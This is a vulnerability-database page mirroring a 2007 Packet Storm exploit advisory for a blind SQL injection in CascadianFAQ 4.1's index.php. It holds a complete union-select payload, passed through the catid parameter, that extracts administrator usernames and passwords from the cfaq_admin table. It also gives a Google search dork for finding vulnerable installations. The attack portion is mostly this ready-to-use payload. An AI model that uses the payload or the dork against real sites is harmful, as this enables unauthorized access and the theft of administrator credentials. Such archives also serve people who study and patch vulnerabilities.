Lucene search

K

cascadianfaq-sql.txt

๐Ÿ—“๏ธย 31 Jan 2007ย 00:00:00Reported byย ajannTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 29ย Views

CascadianFAQ version 4.1 index.php Remote Blind SQL Injection Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`*******************************************************************************  
# Title : CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability  
# Author : ajann  
# Contact : :(  
# S.Page : http://eclectic-designs.com  
# $$ : Free  
# Dork : This FAQ is powered by CascadianFAQ  
# DorkEx : http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=  
  
*******************************************************************************  
  
[[SQL]]]---------------------------------------------------------  
  
http://[target]/[path]//index.php?catid=[SQL]  
  
Example:  
  
//index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*  
  
[[/SQL]]  
  
"""""""""""""""""""""  
# ajann,Turkey  
# ...  
  
# Im not Hacker!  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
29
.json
Report